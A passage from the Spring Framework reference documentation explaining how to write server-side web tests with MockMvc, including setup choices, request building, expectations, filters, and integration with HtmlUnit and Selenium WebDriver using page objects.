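	import org.springframework.context.annotation.ComponentScan;
	import org.springframework.context.annotation.Configuration;
	import org.springframework.web.servlet.config.annotation.EnableWebMvc;

	@Configuration
	@EnableWebMvc
	@ComponentScan("org.example.web") // hypothetical package containing the controllers
	class WebConfig {
	}
----

The test would then declare `@SpringJUnitWebConfig(WebConfig.class)` in place of the XML
location.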
See these\nhttps:\/\/github.com\/spring-projects\/spring-framework\/tree\/master\/spring-test\/src\/test\/java\/org\/springframework\/test\/web\/servlet\/samples\/context[sample tests].\n\nThe `MockMvc` instance is used to perform a `GET` request to `\"\/accounts\/1\"` and verify\nthat the resulting response has status 200, the content type is `\"application\/json\"`, and the\nresponse body has a JSON property called \"name\" with the value \"Lee\". The `jsonPath`\nsyntax is supported through the Jayway https:\/\/github.com\/jayway\/JsonPath[JsonPath\nproject]. There are lots of other options for verifying the result of the performed\nrequest that will be discussed below.\n\n[[spring-mvc-test-server-static-imports]]\n===== Static Imports\nThe fluent API in the example above requires a few static imports such as\n`MockMvcRequestBuilders.{asterisk}`, `MockMvcResultMatchers.{asterisk}`, \nand `MockMvcBuilders.{asterisk}`. An easy way to find these classes is to search for\ntypes matching __\"MockMvc*\"__. If using Eclipse, be sure to add them as \n\"favorite static members\" in the Eclipse preferences under \n__Java -> Editor -> Content Assist -> Favorites__. That will allow use of content\nassist after typing the first character of the static method name. Other IDEs (e.g.\nIntelliJ) may not require any additional configuration. Just check the support for code\ncompletion on static members.\n\n[[spring-mvc-test-server-setup-options]]\n===== Setup Choices\nThere are two main options for creating an instance of `MockMvc`.\nThe first is to load Spring MVC configuration through the __TestContext\nframework__, which loads the Spring configuration and injects a `WebApplicationContext`\ninto the test to use to build a `MockMvc` instance:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextConfiguration(\"my-servlet-context.xml\")\n\tpublic class MyWebTests {\n\n\t\t@Autowired\n\t\tprivate WebApplicationContext wac;\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Before\n\t\tpublic void setup() {\n\t\t\tthis.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThe second is to simply create a controller instance manually without loading Spring\nconfiguration. Instead basic default configuration, roughly comparable to that of\nthe MVC JavaConfig or the MVC namespace, is automatically created and can be customized\nto a degree:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MyWebTests {\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Before\n\t\tpublic void setup() {\n\t\t\tthis.mockMvc = MockMvcBuilders.standaloneSetup(new AccountController()).build();\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nWhich setup option should you use?\n\nThe __\"webAppContextSetup\"__ loads your actual Spring MVC configuration resulting in a\nmore complete integration test. Since the __TestContext framework__ caches the loaded\nSpring configuration, it helps keep tests running fast, even as you introduce more tests\nin your test suite. Furthermore, you can inject mock services into controllers through\nSpring configuration in order to remain focused on testing the web layer. 
Here is an
example of declaring a mock service with Mockito:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="accountService" class="org.mockito.Mockito" factory-method="mock">
		<constructor-arg value="org.example.AccountService"/>
	</bean>
----

You can then inject the mock service into the test in order to set up and verify
expectations:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	@WebAppConfiguration
	@ContextConfiguration("test-servlet-context.xml")
	public class AccountTests {

		@Autowired
		private WebApplicationContext wac;

		private MockMvc mockMvc;

		@Autowired
		private AccountService accountService;

		// ...

	}
----

The __"standaloneSetup"__ on the other hand is a little closer to a unit test. It tests
one controller at a time: the controller can be injected with mock dependencies manually,
and it doesn't involve loading Spring configuration. Such tests are more focused in style
and make it easier to see which controller is being tested, whether any specific Spring
MVC configuration is required to work, and so on. The "standaloneSetup" is also a very
convenient way to write ad-hoc tests to verify specific behavior or to debug an issue.

Just like with any "integration vs. unit testing" debate, there is no right or wrong
answer. However, using the "standaloneSetup" does imply the need for additional
"webAppContextSetup" tests in order to verify your Spring MVC configuration.
Alternatively, you may choose to write all tests with "webAppContextSetup" in order to
always test against your actual Spring MVC configuration.

[[spring-mvc-test-server-setup-steps]]
===== Setup Features

No matter which MockMvc builder you use, all `MockMvcBuilder` implementations provide
some common and very useful features. For example, you can declare an `Accept` header
for all requests and expect a status of 200 as well as a `Content-Type` header
in all responses as follows:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
// static import of MockMvcBuilders.standaloneSetup

MockMvc mockMvc = standaloneSetup(new MusicController())
		.defaultRequest(get("/").accept(MediaType.APPLICATION_JSON))
		.alwaysExpect(status().isOk())
		.alwaysExpect(content().contentType("application/json;charset=UTF-8"))
		.build();
----

In addition, 3rd party frameworks (and applications) may pre-package setup
instructions like the ones above through a `MockMvcConfigurer`. The Spring Framework
has one such built-in implementation that helps to save and re-use the HTTP
session across requests.
It can be used as follows:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
// static import of SharedHttpSessionConfigurer.sharedHttpSession

MockMvc mockMvc = MockMvcBuilders.standaloneSetup(new TestController())
		.apply(sharedHttpSession())
		.build();

// Use mockMvc to perform requests...
----

See `ConfigurableMockMvcBuilder` for a list of all MockMvc builder features
or use the IDE to explore the available options.


[[spring-mvc-test-server-performing-requests]]
===== Performing Requests
It's easy to perform requests using any HTTP method:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(post("/hotels/{id}", 42).accept(MediaType.APPLICATION_JSON));
----

You can also perform file upload requests that internally use
`MockMultipartHttpServletRequest` so that there is no actual parsing of a multipart
request; rather, you have to set it up:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(multipart("/doc").file("a1", "ABC".getBytes("UTF-8")));
----

You can specify query parameters in URI template style:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(get("/hotels?foo={foo}", "bar"));
----

Or you can add Servlet request parameters representing either query or form parameters:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(get("/hotels").param("foo", "bar"));
----

If application code relies on Servlet request parameters and doesn't check the query
string explicitly (as is most often the case), then it doesn't matter which option you use.
Keep in mind, however, that query params provided with the URI template will be decoded while
request parameters provided through the `param(...)` method are expected to already be decoded.

In most cases it's preferable to leave out the context path and the Servlet path from
the request URI. If you must test with the full request URI, be sure to set the
`contextPath` and `servletPath` accordingly so that request mappings will work:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(get("/app/main/hotels/{id}").contextPath("/app").servletPath("/main"))
----

Looking at the above example, it would be cumbersome to set the contextPath and
servletPath with every performed request.
Instead you can set up default request
properties:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class MyWebTests {

		private MockMvc mockMvc;

		@Before
		public void setup() {
			mockMvc = standaloneSetup(new AccountController())
					.defaultRequest(get("/")
							.contextPath("/app").servletPath("/main")
							.accept(MediaType.APPLICATION_JSON))
					.build();
		}

		// ...

	}
----

The above properties will affect every request performed through the `MockMvc` instance.
If the same property is also specified on a given request, it overrides the default value.
That is why the HTTP method and URI in the default request don't matter since they must be
specified on every request.

[[spring-mvc-test-server-defining-expectations]]
===== Defining Expectations
Expectations can be defined by appending one or more `.andExpect(..)` calls after
performing a request:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(get("/accounts/1")).andExpect(status().isOk());
----

`MockMvcResultMatchers.*` provides a number of expectations, some of which are further
nested with more detailed expectations.

Expectations fall into two general categories. The first category of assertions verifies
properties of the response: for example, the response status, headers, and content. These
are the most important results to assert.

The second category of assertions goes beyond the response. These assertions allow
one to inspect Spring MVC specific aspects such as which controller method processed
the request, whether an exception was raised and handled, what the content of the model
is, what view was selected, what flash attributes were added, and so on. They also allow
one to inspect Servlet specific aspects such as request and session attributes.

The following test asserts that binding or validation failed:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(post("/persons"))
		.andExpect(status().isOk())
		.andExpect(model().attributeHasErrors("person"));
----

Many times when writing tests, it's useful to _dump_ the results of the performed request.
This can be done as follows, where `print()` is a static import from
`MockMvcResultHandlers`:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(post("/persons"))
		.andDo(print())
		.andExpect(status().isOk())
		.andExpect(model().attributeHasErrors("person"));
----

As long as request processing does not cause an unhandled exception, the `print()` method
will print all the available result data to `System.out`. Spring Framework 4.2 introduced
a `log()` method and two additional variants of the `print()` method, one that accepts
an `OutputStream` and one that accepts a `Writer`. For example, invoking
`print(System.err)` will print the result data to `System.err`, while invoking
`print(myWriter)` will print the result data to a custom writer. If you would like to
have the result data _logged_ instead of printed, simply invoke the `log()` method which
will log the result data as a single `DEBUG` message under the
`org.springframework.test.web.servlet.result` logging category.
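For instance, a quick sketch of routing the result data to the log rather than the
console; here `log()` is a static import from `MockMvcResultHandlers`, just like
`print()`.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	// logs the result data as a DEBUG message instead of printing it to System.out
	mockMvc.perform(post("/persons"))
		.andDo(log())
		.andExpect(status().isOk());
----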
In some cases, you may want to get direct access to the result and verify something that
cannot be verified otherwise. This can be achieved by appending `.andReturn()` after all
other expectations:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	MvcResult mvcResult = mockMvc.perform(post("/persons")).andExpect(status().isOk()).andReturn();
	// ...
----

If all tests repeat the same expectations, you can set up common expectations once
when building the `MockMvc` instance:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	standaloneSetup(new SimpleController())
		.alwaysExpect(status().isOk())
		.alwaysExpect(content().contentType("application/json;charset=UTF-8"))
		.build()
----

Note that common expectations are __always__ applied and cannot be overridden without
creating a separate `MockMvc` instance.

When JSON response content contains hypermedia links created with
https://github.com/spring-projects/spring-hateoas[Spring HATEOAS], the resulting links can
be verified using JsonPath expressions:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(get("/people").accept(MediaType.APPLICATION_JSON))
		.andExpect(jsonPath("$.links[?(@.rel == 'self')].href").value("http://localhost:8080/people"));
----

When XML response content contains hypermedia links created with
https://github.com/spring-projects/spring-hateoas[Spring HATEOAS], the resulting links can
be verified using XPath expressions:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	Map<String, String> ns = Collections.singletonMap("ns", "http://www.w3.org/2005/Atom");
	mockMvc.perform(get("/handle").accept(MediaType.APPLICATION_XML))
		.andExpect(xpath("/person/ns:link[@rel='self']/@href", ns).string("http://localhost:8080/people"));
----

[[spring-mvc-test-server-filters]]
===== Filter Registrations
When setting up a `MockMvc` instance, you can register one or more Servlet `Filter` instances:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc = standaloneSetup(new PersonController()).addFilters(new CharacterEncodingFilter()).build();
----

Registered filters will be invoked through the `MockFilterChain` from `spring-test`, and the
last filter will delegate to the `DispatcherServlet`.

[[spring-mvc-test-vs-end-to-end-integration-tests]]
===== Differences between Out-of-Container and End-to-End Integration Tests

As mentioned earlier, __Spring MVC Test__ is built on the Servlet API mock objects from
the `spring-test` module and does not use a running Servlet container. Therefore
there are some important differences compared to full end-to-end integration tests
with an actual client and server running.

The easiest way to think about this is starting with a blank `MockHttpServletRequest`.
Whatever you add to it is what the request will be. Things that may catch you by surprise
are that there is no context path by default, no `jsessionid` cookie, no forwarding, error,
or async dispatches, and therefore no actual JSP rendering. Instead, "forwarded" and
"redirected" URLs are saved in the `MockHttpServletResponse` and can be asserted with
expectations.

This means if you are using JSPs, you can verify the JSP page to which the request was
forwarded, but there won't be any HTML rendered. In other words, the JSP will not be
_invoked_. Note however that all other rendering technologies which don't rely on
forwarding, such as Thymeleaf and FreeMarker, will render HTML to the response body as
expected. The same is true for rendering JSON, XML, and other formats via `@ResponseBody`
methods.
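Returning to the forwarding case above, a hedged sketch of asserting the saved
"forwarded" URL might look as follows; the JSP path is an assumption, and
`forwardedUrl()` is a static import from `MockMvcResultMatchers`.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	// the JSP itself is not rendered; only the forwarded URL is recorded and asserted
	mockMvc.perform(get("/accounts/1"))
		.andExpect(status().isOk())
		.andExpect(forwardedUrl("/WEB-INF/jsp/account.jsp"));
----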
Alternatively you may consider the full end-to-end integration testing support from
Spring Boot via `@WebIntegrationTest`. See the
{doc-spring-boot}/html/boot-features-testing.html#boot-features-testing-spring-boot-applications[Spring Boot reference].

There are pros and cons for each approach. The options provided in __Spring MVC Test__
are different stops on the scale from classic unit testing to full integration testing.
To be certain, none of the options in Spring MVC Test fall under the category of classic
unit testing, but they _are_ a little closer to it. For example, you can isolate the web
layer by injecting mocked services into controllers, in which case you're testing the web
layer only through the `DispatcherServlet` but with actual Spring configuration, just
like you might test the data access layer in isolation from the layers above. Or you
can use the standalone setup, focusing on one controller at a time and manually providing
the configuration required to make it work.

Another important distinction when using __Spring MVC Test__ is that conceptually such
tests are on the _inside_ of the server side, so you can check what handler was used,
whether an exception was handled with a `HandlerExceptionResolver`, what the content of the
model is, what binding errors there were, and so on. That means it's easier to write
expectations since the server is not a black box as it is when testing it through
an actual HTTP client. This is generally an advantage of classic unit testing: it's
easier to write, reason about, and debug, but it does not replace the need for full
integration tests. At the same time it's important not to lose sight of the fact that
the response is the most important thing to check. In short, there is room here for
multiple styles and strategies of testing even within the same project.


[[spring-mvc-test-server-resources]]
===== Further Server-Side Test Examples
The framework's own tests include
https://github.com/spring-projects/spring-framework/tree/master/spring-test/src/test/java/org/springframework/test/web/servlet/samples[many
sample tests] intended to demonstrate how to use Spring MVC Test. Browse these examples
for further ideas. Also the
https://github.com/spring-projects/spring-mvc-showcase[spring-mvc-showcase] has full test
coverage based on Spring MVC Test.


[[spring-mvc-test-server-htmlunit]]
==== HtmlUnit Integration

Spring provides integration between <<spring-mvc-test-server,MockMvc>> and
http://htmlunit.sourceforge.net/[HtmlUnit]. This simplifies performing end-to-end testing
when using HTML based views.
This integration enables developers to:

* Easily test HTML pages using tools such as http://htmlunit.sourceforge.net/[HtmlUnit],
http://seleniumhq.org/projects/webdriver/[WebDriver], and
http://www.gebish.org/manual/current/testing.html#spock_junit__testng[Geb] without the
need to deploy to a Servlet container
* Test JavaScript within pages
* Optionally test using mock services to speed up testing
* Share logic between in-container end-to-end tests and out-of-container integration tests

[NOTE]
====
`MockMvc` works with templating technologies that do not rely on a Servlet Container (e.g.,
Thymeleaf, FreeMarker, etc.), but it does not work with JSPs since they rely on the Servlet
container.
====

[[spring-mvc-test-server-htmlunit-why]]
===== Why HtmlUnit Integration?

The most obvious question that comes to mind is, "Why do I need this?". The answer is best
found by exploring a very basic sample application. Assume you have a Spring MVC web
application that supports CRUD operations on a `Message` object. The application also supports
paging through all messages. How would you go about testing it?

With Spring MVC Test, we can easily test whether we are able to create a `Message`.

[source,java]
----
MockHttpServletRequestBuilder createMessage = post("/messages/")
	.param("summary", "Spring Rocks")
	.param("text", "In case you didn't know, Spring Rocks!");

mockMvc.perform(createMessage)
	.andExpect(status().is3xxRedirection())
	.andExpect(redirectedUrl("/messages/123"));
----

What if we want to test our form view that allows us to create the message? For example,
assume our form looks like the following snippet:

[source,xml]
----
<form id="messageForm" action="/messages/" method="post">
	<div class="pull-right"><a href="/messages/">Messages</a></div>

	<label for="summary">Summary</label>
	<input type="text" class="required" id="summary" name="summary" value="" />

	<label for="text">Message</label>
	<textarea id="text" name="text"></textarea>

	<div class="form-actions">
		<input type="submit" value="Create" />
	</div>
</form>
----

How do we ensure that our form will produce the correct request to create a new message? A
naive attempt would look like this:

[source,java]
----
mockMvc.perform(get("/messages/form"))
	.andExpect(xpath("//input[@name='summary']").exists())
	.andExpect(xpath("//textarea[@name='text']").exists());
----

This test has some obvious drawbacks. If we update our controller to use the parameter
`message` instead of `text`, our form test would continue to pass even though the HTML
form is out of sync with the controller.
To resolve this we can combine our two tests.\n\n[[spring-mvc-test-server-htmlunit-mock-mvc-test]]\n[source,java]\n----\nString summaryParamName = \"summary\";\nString textParamName = \"text\";\nmockMvc.perform(get(\"\/messages\/form\"))\n\t\t.andExpect(xpath(\"\/\/input[@name='\" + summaryParamName + \"']\").exists())\n\t\t.andExpect(xpath(\"\/\/textarea[@name='\" + textParamName + \"']\").exists());\n\nMockHttpServletRequestBuilder createMessage = post(\"\/messages\/\")\n\t\t.param(summaryParamName, \"Spring Rocks\")\n\t\t.param(textParamName, \"In case you didn't know, Spring Rocks!\");\n\nmockMvc.perform(createMessage)\n\t\t.andExpect(status().is3xxRedirection())\n\t\t.andExpect(redirectedUrl(\"\/messages\/123\"));\n----\n\nThis would reduce the risk of our test incorrectly passing, but there are still some\nproblems.\n\n* What if we have multiple forms on our page? Admittedly we could update our xpath\n expressions, but they get more complicated the more factors we take into account (Are the\n fields the correct type? Are the fields enabled? etc.).\n* Another issue is that we are doing double the work we would expect.\n We must first verify the view, and then we submit the view with the same parameters we just\n verified. Ideally this could be done all at once.\n* Finally, there are some things that we still cannot account for. For example, what if the\n form has JavaScript validation that we wish to test as well?\n\nThe overall problem is that testing a web page does not involve a single interaction.\nInstead, it is a combination of how the user interacts with a web page and how that web\npage interacts with other resources. For example, the result of a form view is used as\nthe input to a user for creating a message. In addition, our form view may potentially\nutilize additional resources which impact the behavior of the page, such as JavaScript\nvalidation.\n\n[[spring-mvc-test-server-htmlunit-why-integration]]\n====== Integration testing to the rescue?\n\nTo resolve the issues above we could perform end-to-end integration testing, but this has\nsome obvious drawbacks. Consider testing the view that allows us to page through the messages.\nWe might need the following tests.\n\n* Does our page display a notification to the user indicating that no results are available\nwhen the messages are empty?\n* Does our page properly display a single message?\n* Does our page properly support paging?\n\nTo set up these tests, we would need to ensure our database contained the proper messages\nin it. This leads to a number of additional challenges.\n\n* Ensuring the proper messages are in the database can be tedious; consider foreign key\n constraints.\n* Testing can become slow since each test would need to ensure that the database is in the\n correct state.\n* Since our database needs to be in a specific state, we cannot run tests in parallel.\n* Performing assertions on things like auto-generated ids, timestamps, etc. can be difficult.\n\nThese challenges do not mean that we should abandon end-to-end integration testing\naltogether. Instead, we can reduce the number of end-to-end integration tests by\nrefactoring our detailed tests to use mock services which will execute much faster, more\nreliably, and without side effects. 
We can then implement a small number of _true_\nend-to-end integration tests that validate simple workflows to ensure that everything\nworks together properly.\n\n[[spring-mvc-test-server-htmlunit-why-mockmvc]]\n====== Enter HtmlUnit Integration\n\nSo how can we achieve a balance between testing the interactions of our pages and still\nretain good performance within our test suite? The answer is: \"By integrating MockMvc\nwith HtmlUnit.\"\n\n[[spring-mvc-test-server-htmlunit-options]]\n====== HtmlUnit Integration Options\n\nThere are a number of ways to integrate `MockMvc` with HtmlUnit.\n\n* <<spring-mvc-test-server-htmlunit-mah,MockMvc and HtmlUnit>>: Use this option if you\nwant to use the raw HtmlUnit libraries.\n* <<spring-mvc-test-server-htmlunit-webdriver,MockMvc and WebDriver>>: Use this option to\nease development and reuse code between integration and end-to-end testing.\n* <<spring-mvc-test-server-htmlunit-geb,MockMvc and Geb>>: Use this option if you would\nlike to use Groovy for testing, ease development, and reuse code between integration and\nend-to-end testing.\n\n[[spring-mvc-test-server-htmlunit-mah]]\n===== MockMvc and HtmlUnit\n\nThis section describes how to integrate `MockMvc` and HtmlUnit. Use this option if you\nwant to use the raw HtmlUnit libraries.\n\n[[spring-mvc-test-server-htmlunit-mah-setup]]\n====== MockMvc and HtmlUnit Setup\n\nFirst, make sure that you have included a test dependency on `net.sourceforge.htmlunit:htmlunit`.\nIn order to use HtmlUnit with Apache HttpComponents 4.5+, you will need to use HtmlUnit\n2.18 or higher.\n\nWe can easily create an HtmlUnit `WebClient` that integrates with `MockMvc` using the\n`MockMvcWebClientBuilder` as follows.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\n[NOTE]\n====\nThis is a simple example of using `MockMvcWebClientBuilder`. For advanced usage see\n<<Advanced MockMvcWebClientBuilder>>\n====\n\nThis will ensure that any URL referencing `localhost` as the server will be directed to\nour `MockMvc` instance without the need for a real HTTP connection. Any other URL will be\nrequested using a network connection as normal. This allows us to easily test the use of\nCDNs.\n\n[[spring-mvc-test-server-htmlunit-mah-usage]]\n====== MockMvc and HtmlUnit Usage\n\nNow we can use HtmlUnit as we normally would, but without the need to deploy our\napplication to a Servlet container. For example, we can request the view to create\na message with the following.\n\n[source,java]\n----\nHtmlPage createMsgFormPage = webClient.getPage(\"http:\/\/localhost\/messages\/form\");\n----\n\n[NOTE]\n====\nThe default context path is `\"\"`. 
Alternatively, we can specify the context path as\nillustrated in <<Advanced MockMvcWebClientBuilder>>.\n====\n\nOnce we have a reference to the `HtmlPage`, we can then fill out the form and submit\nit to create a message.\n\n[source,java]\n----\nHtmlForm form = createMsgFormPage.getHtmlElementById(\"messageForm\");\nHtmlTextInput summaryInput = createMsgFormPage.getHtmlElementById(\"summary\");\nsummaryInput.setValueAttribute(\"Spring Rocks\");\nHtmlTextArea textInput = createMsgFormPage.getHtmlElementById(\"text\");\ntextInput.setText(\"In case you didn't know, Spring Rocks!\");\nHtmlSubmitInput submit = form.getOneHtmlElementByAttribute(\"input\", \"type\", \"submit\");\nHtmlPage newMessagePage = submit.click();\n----\n\nFinally, we can verify that a new message was created successfully. The following\nassertions use the http:\/\/joel-costigliola.github.io\/assertj\/[AssertJ] library.\n\n[source,java]\n----\nassertThat(newMessagePage.getUrl().toString()).endsWith(\"\/messages\/123\");\nString id = newMessagePage.getHtmlElementById(\"id\").getTextContent();\nassertThat(id).isEqualTo(\"123\");\nString summary = newMessagePage.getHtmlElementById(\"summary\").getTextContent();\nassertThat(summary).isEqualTo(\"Spring Rocks\");\nString text = newMessagePage.getHtmlElementById(\"text\").getTextContent();\nassertThat(text).isEqualTo(\"In case you didn't know, Spring Rocks!\");\n----\n\nThis improves on our <<spring-mvc-test-server-htmlunit-mock-mvc-test,MockMvc test>> in a\nnumber of ways. First we no longer have to explicitly verify our form and then create a\nrequest that looks like the form. Instead, we request the form, fill it out, and submit\nit, thereby significantly reducing the overhead.\n\nAnother important factor is that http:\/\/htmlunit.sourceforge.net\/javascript.html[HtmlUnit\nuses the Mozilla Rhino engine] to evaluate JavaScript. This means that we can test the\nbehavior of JavaScript within our pages as well!\n\nRefer to the http:\/\/htmlunit.sourceforge.net\/gettingStarted.html[HtmlUnit documentation]\nfor additional information about using HtmlUnit.\n\n[[spring-mvc-test-server-htmlunit-mah-advanced-builder]]\n====== Advanced MockMvcWebClientBuilder\n\nIn the examples so far, we have used `MockMvcWebClientBuilder` in the simplest way possible,\nby building a `WebClient` based on the `WebApplicationContext` loaded for us by the Spring\nTestContext Framework. 
This approach is repeated here.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\nWe can also specify additional configuration options.\n\n[source,java]\n----\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t\/\/ demonstrates applying a MockMvcConfigurer (Spring Security)\n\t\t.webAppContextSetup(context, springSecurity())\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n}\n----\n\nAs an alternative, we can perform the exact same setup by configuring the `MockMvc`\ninstance separately and supplying it to the `MockMvcWebClientBuilder` as follows.\n\n[source,java]\n----\nMockMvc mockMvc = MockMvcBuilders\n\t\t.webAppContextSetup(context)\n\t\t.apply(springSecurity())\n\t\t.build();\n\nwebClient = MockMvcWebClientBuilder\n\t\t.mockMvcSetup(mockMvc)\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n----\n\nThis is more verbose, but by building the `WebClient` with a `MockMvc` instance we have\nthe full power of `MockMvc` at our fingertips.\n\n[TIP]\n====\nFor additional information on creating a `MockMvc` instance refer to\n<<spring-mvc-test-server-setup-options>>.\n====\n\n[[spring-mvc-test-server-htmlunit-webdriver]]\n===== MockMvc and WebDriver\n\nIn the previous sections, we have seen how to use `MockMvc` in conjunction with the raw\nHtmlUnit APIs. In this section, we will leverage additional abstractions within the Selenium\nhttp:\/\/docs.seleniumhq.org\/projects\/webdriver\/[WebDriver] to make things even easier.\n\n[[spring-mvc-test-server-htmlunit-webdriver-why]]\n====== Why WebDriver and MockMvc?\n\nWe can already use HtmlUnit and `MockMvc`, so why would we want to use `WebDriver`? The\nSelenium `WebDriver` provides a very elegant API that allows us to easily organize our code.\nTo better understand, let's explore an example.\n\n[NOTE]\n====\nDespite being a part of http:\/\/docs.seleniumhq.org\/[Selenium], WebDriver does not require\na Selenium Server to run your tests.\n====\n\nSuppose we need to ensure that a message is created properly. The tests involve finding\nthe HTML form input elements, filling them out, and making various assertions.\n\nThis approach results in numerous, separate tests because we want to test error\nconditions as well. For example, we want to ensure that we get an error if we fill out\nonly part of the form. If we fill out the entire form, the newly created message should\nbe displayed afterwards.\n\nIf one of the fields were named \"summary\", then we might have something like the\nfollowing repeated in multiple places within our tests.\n\n[source,java]\n----\nHtmlTextInput summaryInput = currentPage.getHtmlElementById(\"summary\");\nsummaryInput.setValueAttribute(summary);\n----\n\nSo what happens if we change the `id` to \"smmry\"? Doing so would force us to update all\nof our tests to incorporate this change! 
Of course, this violates the _DRY Principle_; so
we should ideally extract this code into its own method as follows.

[source,java]
----
public HtmlPage createMessage(HtmlPage currentPage, String summary, String text) {
	setSummary(currentPage, summary);
	// ...
}

public void setSummary(HtmlPage currentPage, String summary) {
	HtmlTextInput summaryInput = currentPage.getHtmlElementById("summary");
	summaryInput.setValueAttribute(summary);
}
----

This ensures that we do not have to update all of our tests if we change the UI.

We might even take this a step further and place this logic within an object that
represents the `HtmlPage` we are currently on.

[source,java]
----
public class CreateMessagePage {

	final HtmlPage currentPage;

	final HtmlTextInput summaryInput;

	final HtmlSubmitInput submit;

	public CreateMessagePage(HtmlPage currentPage) {
		this.currentPage = currentPage;
		this.summaryInput = currentPage.getHtmlElementById("summary");
		this.submit = currentPage.getHtmlElementById("submit");
	}

	public <T> T createMessage(String summary, String text) throws Exception {
		setSummary(summary);

		HtmlPage result = submit.click();
		boolean error = CreateMessagePage.at(result);

		return (T) (error ? new CreateMessagePage(result) : new ViewMessagePage(result));
	}

	public void setSummary(String summary) throws Exception {
		summaryInput.setValueAttribute(summary);
	}

	public static boolean at(HtmlPage page) {
		return "Create Message".equals(page.getTitleText());
	}
}
----

Formally, this pattern is known as the
https://github.com/SeleniumHQ/selenium/wiki/PageObjects[Page Object Pattern]. While we can
certainly do this with HtmlUnit, WebDriver provides some tools that we will explore in the
following sections to make this pattern much easier to implement.

[[spring-mvc-test-server-htmlunit-webdriver-setup]]
====== MockMvc and WebDriver Setup

To use Selenium WebDriver with the Spring MVC Test framework, make sure that your project
includes a test dependency on `org.seleniumhq.selenium:selenium-htmlunit-driver`.

We can easily create a Selenium `WebDriver` that integrates with `MockMvc` using the
`MockMvcHtmlUnitDriverBuilder` as follows.

[source,java]
----
@Autowired
WebApplicationContext context;

WebDriver driver;

@Before
public void setup() {
	driver = MockMvcHtmlUnitDriverBuilder
		.webAppContextSetup(context)
		.build();
}
----

[NOTE]
====
This is a simple example of using `MockMvcHtmlUnitDriverBuilder`.
For more advanced usage, refer to <<Advanced MockMvcHtmlUnitDriverBuilder>>.
====

This will ensure that any URL referencing `localhost` as the server will be directed to
our `MockMvc` instance without the need for a real HTTP connection. Any other URL will be
requested using a network connection as normal. This allows us to easily test the use of
CDNs.

[[spring-mvc-test-server-htmlunit-webdriver-usage]]
====== MockMvc and WebDriver Usage

Now we can use WebDriver as we normally would, but without the need to deploy our
application to a Servlet container.
For example, we can request the view to create\na message with the following.\n\n[source,java]\n----\nCreateMessagePage page = CreateMessagePage.to(driver);\n----\n\nWe can then fill out the form and submit it to create a message.\n\n[source,java]\n----\nViewMessagePage viewMessagePage =\n\tpage.createMessage(ViewMessagePage.class, expectedSummary, expectedText);\n----\n\nThis improves on the design of our\n<<spring-mvc-test-server-htmlunit-mah-usage,HtmlUnit test>> by leveraging the _Page Object\nPattern_. As we mentioned in <<spring-mvc-test-server-htmlunit-webdriver-why>>, we can\nuse the Page Object Pattern with HtmlUnit, but it is much easier with WebDriver. Let's\ntake a look at our new `CreateMessagePage` implementation.\n\n[source,java]\n----\npublic class CreateMessagePage\n\t\textends AbstractPage { \/\/ <1>\n\n\t\/\/ <2>\n\tprivate WebElement summary;\n\tprivate WebElement text;\n\n\t\/\/ <3>\n\t@FindBy(css = \"input[type=submit]\")\n\tprivate WebElement submit;\n\n\tpublic CreateMessagePage(WebDriver driver) {\n\t\tsuper(driver);\n\t}\n\n\tpublic <T> T createMessage(Class<T> resultPage, String summary, String details) {\n\t\tthis.summary.sendKeys(summary);\n\t\tthis.text.sendKeys(details);\n\t\tthis.submit.click();\n\t\treturn PageFactory.initElements(driver, resultPage);\n\t}\n\n\tpublic static CreateMessagePage to(WebDriver driver) {\n\t\tdriver.get(\"http:\/\/localhost:9990\/mail\/messages\/form\");\n\t\treturn PageFactory.initElements(driver, CreateMessagePage.class);\n\t}\n}\n----\n\n<1> The first thing you will notice is that 